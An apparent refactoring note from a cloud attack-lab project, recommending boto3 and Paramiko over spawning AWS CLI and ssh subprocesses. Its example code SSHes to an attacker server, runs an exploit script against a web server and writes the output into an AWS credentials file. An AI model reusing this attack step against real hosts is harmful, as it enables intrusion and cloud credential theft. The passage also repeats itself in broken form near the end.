Among other problems, spawning a new process reduces the main program's control over program logic and will make testing automation difficult.
Examples include calls to the AWS CLI and calls to ssh. The former can use the boto3 library (see this commit) while an example of using the Paramiko library as an SSH client can be found in this commit.
E.g. this:
subprocess.call("ssh -o 'StrictHostKeyChecking accept-new' -i ./files/var/ssh/id_rsa ubuntu@"+ATTACKER_SERVER_PUBLIC_IP+" 'sudo python3 exploit.py "+WEB_SERVER_PUBLIC_IP+" > /home/ubuntu/.aws/credentials'", shell=True)becomes this:
ssh_client = SSHClient(
ATTACKER_SERVER_PUBLIC_IP, 'ubuntu', './files/var/ssh/id_rsa')
ssh_client.connect()
ssh_client.exec(
'sudo python3 exploit.py {} > /home/ubuntu/.aws/credentials'.format(WEB_SERVER_PUBLIC_IP)
)
Among other problems, spawning a new process reduces the main program's control over program logic and will make testing automation difficult.
Examples include calls to the AWS CLI and calls to ssh. The former can use the
boto3library (see this commit) while an example of using theParamikolibrary as an SSH client can be found in this commit.E.g. this:
becomes this: